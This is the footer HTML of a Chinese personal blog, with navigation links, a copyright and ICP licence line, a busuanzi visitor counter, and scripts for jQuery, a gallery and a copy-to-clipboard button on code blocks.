        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-right">
    Copyright &copy;
    
    
    2016-2021
    Sampson.Z
<img src="https://www.buhuixiu.com/images/jgawb.png">
<a href="http://www.beian.miit.gov.cn/"  style="color:#f72b07" target="_blank">粤ICP备19066509号</a>

  
  
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/zhuxinkai.site/">zhuxinkai.site</a></li>
        
      </ul>
    </nav>
  



        <!-- 不蒜子统计 -->
        <span id="busuanzi_container_site_pv">
                本站总访问量<span id="busuanzi_value_site_pv"></span>次
        </span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv" style='display:none'>
                本站访客数<span id="busuanzi_value_site_uv"></span>人
        </span>
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

</div>


</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
